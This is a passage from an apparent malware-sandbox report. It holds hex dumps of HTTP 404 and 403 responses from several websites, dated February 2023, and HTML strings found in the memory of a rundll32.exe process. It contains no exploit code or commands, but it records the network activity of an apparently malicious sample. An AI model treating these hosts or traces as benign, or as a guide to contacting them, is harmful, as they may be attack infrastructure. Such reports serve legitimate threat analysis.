3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Feb 2023 13:39:05 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.staciesellslka.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 11491Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 97 db 36 92 e8 e7 f4 39 f9 0f 08 7d 9c 6e ed 88 12 49 bd d5 8f 4c a7 e3 cc 78 f3 98 8c ed 99 d9 7b 77 f7 f4 a1 48 48 a2 4d 91 0a 49 b5 ba d3 e3 1f b4 7f e3 fe b2 5b 85 07 09 be 24 b5 24 27 99 b5 9d d8 dd 04 0b 55 85 42 a1 00 14 0a c5 8b 2f be f9 cb cd 9b ff f3 d3 0b 32 4f 16 fe d5 c9 05 fe 20 8e 6f c7 f1 a5 66 df d9 ae ad 63 89 ee db 0f e1 2a d1 d7 9e 4b 89 52 3c a7 b6 4b 23 7d 19 c6 5e e2 85 81 9e 84 4b 8d f8 76 30 bb d4 68 a0 ff ed b5 46 96 11 9d 7a f7 97 5a 38 1b 03 89 64 39 6e b7 c3 d9 b2 b5 a0 ed 20 7e 46 a6 93 72 69 7b 3a 79 a6 21 27 80 fb ea e4 b3 8b 05 4d 6c 06 a4 d3 9f 57 de dd a5 f6 1f fa df ae f5 9b 70 b1 b4 13 6f e2 53 8d 38 61 90 d0 20 b9 d4 5e be b8 a4 ee 0c 4a da 95 15 6f 38 9c fe e6 61 a9 d6 4a e8 7d d2 c6 e6 9c 13 67 6e 47 31 4d 2e 57 c9 54 1f 6a 19 96 c0 5e d0 4b ed ce a3 eb 65 18 25 4a 5d 10 48 32 bf 74 e9 9d e7 50 9d 3d 34 89 17 80 30 6c 5f 8f 1d db a7 97 a6 e0 26 f1 12 9f 5e fd 64 cf 28 09 c2 84 4c c3 55 e0 92 2f 9f 0d 2d d3 3c 27 df db ef 28 b9 0e 02 9b bc a2 b6 4f 5e c4 89 9d d0 8b 36 af 73 a2 f0 70 1a 85 93 30 89 4f 53 0e 4e 17 f6 bd ee 2d 00 ad 0e a2 46 0e c7 be 1d cd e8 29 52 bd f0 bd e0 1d 89 a8 7f 79 ea 06 31 02 4c 69 e2 cc 4f c9 1c 7e bb 3c 6d b7 df d1 38 81 d7 2d cf bd 9f 87 0b da 72 c2 45 a1 a2 66 fb 09 8d 02 60 47 23 09 c8 0d 0a 96 4b df 73 6c ec ef 76 14 c7 7f b8 5f f8 f0 0a 39 bd d4 2a db 41 be 8c ec 9f 57 e1 39 f9 96 52 57 e3 b4 35 ec 97 18 ba 7d bd 5e b7 00 ca f1 68 4c 7d 3f f6 df d9 c8 44 7b 0a a0 6d ed c3 b1 02 ea b3 00 f1 c5 4f e1 c9 11 75 14 e6 3e c3 3f 0a 87 f1 1c d4 c3 59 25 c4 83 fe 51 d1 d6 63 5d 2f 75 d1 97 ed d5 d2 0f 6d 37 6e 5b 86 d5 69 1b 56 db 0f 67 a1 de ef b6 de 2e 67 b2 c5 ac a7 db d0 e3 0c 3f e3 40 30 f1 85 ae 93 6b 90 07 25 6f c2 95 33 27 2f 01 82 e8 3a e3 51 95 21 82 c0 38 05 10 81 24 f6 7e a1 30 d8 cd a1 71 0f 7f 8f c3 34 20 62 5c 17 f9 0b dc 28 f4 dc 3a de f2 fc 8c ac 7b f8 7b 24 7e 46 56 15 3f 3f bc 26 2f c0 5e e4 f9 51 06 fc 22 56 34 4c 7f e3 f9 f4 25 ca 5f 19 ff 87 b1 65 0d 32 31 a9 92 38 8d 93 07 9f c6 73 4a 93 53 e2 b9 97 a7 80 88 0f 6e 3d f6 3d 66 71 a3 50 5f ae 26 c0 db 2d 10 9a 78 01 d5 9d 38 96 03 7b 67 ae 96 fe 6a e6 81 c9 85 a2 59 18 ce 40 33 96 be ed d0 38 4f ad cd 29 b5 81 02 40 c2 ab 02 e9 16 bc f8 ea 8e 46 97 a6 d9 1a 9e 72 4d 3d 65 56 95 f1 b4 a0 ae 67 5f 9e da be 5f 34 4a 15 cd fc c5 f3 fd 70 5d 6c 2d 27 97 d0 05 b0 97 50 f3 d0 b6 56 11 a9 6d 64 4a 35 6d a6 d5 1a 1c d6 4a 4e ff 76 dd f9 f0 0d 49 49 1d 8b fb 55 20 3a e5 c3 f7 41 7c 2b 89 1d 9d 79 17 26 d1 5f b5 05 8c e2 b1 9a e1 cc 3d Data Ascii
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Feb 2023 13:39:08 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.staciesellslka.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 34 37 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 61 76 61 64 61 2d 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 77 69 64 65 20 61 76 61 64 61 2d 68 74 6d 6c 2d 68 65 61 64 65 72 2d 70 6f 73 69 74 69 6f 6e 2d 74 6f 70 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4c 61 6b 65 20 41 6e 6e 61 20 52 65 61 6c 20 45 73 74 61 74 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6b 65 73 74 72 65 6c 2e 69 64 78 68 6f 6d 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4c 61 6b 65 20 41 6e 6e 61 20 52 65 61 6c 20 45 73 74 61 74 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 74 61 63 69 65 73 65 6c 6c 73 6c 6b 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4c 61 6b 65 20 41 6e 6e 61 20 52 65 61 6c 20 45 73 74 61 74 65 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 74 61 63 69 65 73 65 6c 6c 73 6c 6b 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 09 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 7
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Feb 2023 13:39:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 30 0d 0a 0d 0a Data Ascii: 0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Feb 2023 13:39:22 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 61 73 74 6d 69 6c 65 72 65 6e 74 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Feb 2023 13:39:25 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 61 73 74 6d 69 6c 65 72 65 6e 74 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 06 Feb 2023 13:39:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 b3 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 43 94 24 e5 a7 54 da d9 24 a7 e6 95 a4 16 d9 d9 a4 64 96 01 f5 1a 82 b4 00 15 18 da d9 e8 c3 44 90 0c 00 8b c3 74 e8 43 0c d0 07 5b 0b 00 14 ea 03 0f 7d 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 66(HML),I310Vp/JLIIC$T$dDtC[}0
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 06 Feb 2023 13:39:48 GMTContent-Type: text/htmlContent-Length: 125Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Feb 2023 13:40:02 GMTServer: Apache/2.4.55 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Feb 2023 13:40:05 GMTServer: Apache/2.4.55 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <div class="fusion-social-links-header"><div class="fusion-social-networks boxed-icons"><div class="fusion-social-networks-wrapper"><a class="fusion-social-network-icon fusion-tooltip fusion-facebook awb-icon-facebook" style="color:#ffffff;background-color:#3b5998;border-color:#3b5998;" data-placement="bottom" data-title="Facebook" data-toggle="tooltip" title="Facebook" href="https://www.facebook.com/staciesellsLKA" target="_blank" rel="noreferrer"><span class="screen-reader-text">Facebook</span></a><a class="fusion-social-network-icon fusion-tooltip fusion-instagram awb-icon-instagram" style="color:#ffffff;background-color:#3f729b;border-color:#3f729b;" data-placement="bottom" data-title="Instagram" data-toggle="tooltip" title="Instagram" href="https://www.instagram.com/realestatewithstacie/" target="_blank" rel="noopener noreferrer"><span class="screen-reader-text">Instagram</span></a><a class="fusion-social-network-icon fusion-tooltip fusion-linkedin awb-icon-linkedin" style="color:#ffffff;background-color:#0077b5;border-color:#0077b5;" data-placement="bottom" data-title="LinkedIn" data-toggle="tooltip" title="LinkedIn" href="https://www.linkedin.com/in/stacie-chandler-03068570/" target="_blank" rel="noopener noreferrer"><span class="screen-reader-text">LinkedIn</span></a></div></div></div></div> equals www.facebook.com (Facebook)
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <div class="fusion-social-links-header"><div class="fusion-social-networks boxed-icons"><div class="fusion-social-networks-wrapper"><a class="fusion-social-network-icon fusion-tooltip fusion-facebook awb-icon-facebook" style="color:#ffffff;background-color:#3b5998;border-color:#3b5998;" data-placement="bottom" data-title="Facebook" data-toggle="tooltip" title="Facebook" href="https://www.facebook.com/staciesellsLKA" target="_blank" rel="noreferrer"><span class="screen-reader-text">Facebook</span></a><a class="fusion-social-network-icon fusion-tooltip fusion-instagram awb-icon-instagram" style="color:#ffffff;background-color:#3f729b;border-color:#3f729b;" data-placement="bottom" data-title="Instagram" data-toggle="tooltip" title="Instagram" href="https://www.instagram.com/realestatewithstacie/" target="_blank" rel="noopener noreferrer"><span class="screen-reader-text">Instagram</span></a><a class="fusion-social-network-icon fusion-tooltip fusion-linkedin awb-icon-linkedin" style="color:#ffffff;background-color:#0077b5;border-color:#0077b5;" data-placement="bottom" data-title="LinkedIn" data-toggle="tooltip" title="LinkedIn" href="https://www.linkedin.com/in/stacie-chandler-03068570/" target="_blank" rel="noopener noreferrer"><span class="screen-reader-text">LinkedIn</span></a></div></div></div></div> equals www.linkedin.com (Linkedin)
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="S equals www.facebook.com (Facebook)
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: </div><div class="fusion-social-links fusion-social-links-1" style="--awb-margin-top:0px;--awb-margin-right:0px;--awb-margin-bottom:0px;--awb-margin-left:0px;--awb-box-border-top:0px;--awb-box-border-right:0px;--awb-box-border-bottom:0px;--awb-box-border-left:0px;--awb-icon-colors-hover:rgba(166,109,63,0.8);--awb-box-colors-hover:rgba(242,243,245,0.8);--awb-box-border-color:var(--awb-color3);--awb-box-border-color-hover:var(--awb-color4);"><div class="fusion-social-networks boxed-icons color-type-brand"><div class="fusion-social-networks-wrapper"><a class="fusion-social-network-icon fusion-tooltip fusion-facebook awb-icon-facebook" style="color:#ffffff;font-size:16px;width:16px;background-color:#3b5998;border-color:#3b5998;border-radius:4px;" data-placement="top" data-title="Facebook" data-toggle="tooltip" title="Facebook" aria-label="facebook" target="_blank" rel="noopener noreferrer" href="https://www.facebook.com/staciesellsLKA"></a><a class="fusion-social-network-icon fusion-tooltip fusion-instagram awb-icon-instagram" style="color:#ffffff;font-size:16px;width:16px;background-color:#3f729b;border-color:#3f729b;border-radius:4px;" data-placement="top" data-title="Instagram" data-toggle="tooltip" title="Instagram" aria-label="instagram" target="_blank" rel="noopener noreferrer" href="https://www.instagram.com/realestatewithstacie/"></a><a class="fusion-social-network-icon fusion-tooltip fusion-linkedin awb-icon-linkedin" style="color:#ffffff;font-size:16px;width:16px;background-color:#0077b5;border-color:#0077b5;border-radius:4px;" data-placement="top" data-title="LinkedIn" data-toggle="tooltip" title="LinkedIn" aria-label="linkedin" target="_blank" rel="noopener noreferrer" href="https://www.linkedin.com/in/stacie-chandler-03068570/"></a></div></div></div></div></div><div class="fusion-layout-column fusion_builder_column fusion-builder-column-2 fusion-flex-column" style="--awb-bg-size:cover;--awb-width-large:15%;--awb-margin-top-large:0px;--awb-spacing-right-large:15.833333333333%;--awb-margin-bottom-large:60px;--awb-spacing-left-large:15.833333333333%;--awb-width-medium:15%;--awb-order-medium:0;--awb-spacing-right-medium:15.833333333333%;--awb-spacing-left-medium:15.833333333333%;--awb-width-small:50%;--awb-order-small:0;--awb-spacing-right-small:4.75%;--awb-spacing-left-small:4.75%;"><div class="fusion-column-wrapper fusion-column-has-shadow fusion-flex-justify-content-flex-start fusion-content-layout-column"><div class="fusion-text fusion-text-3" style="--awb-content-alignment:left;--awb-font-size:18px;--awb-text-color:var(--awb-color1);"><p>QUICK 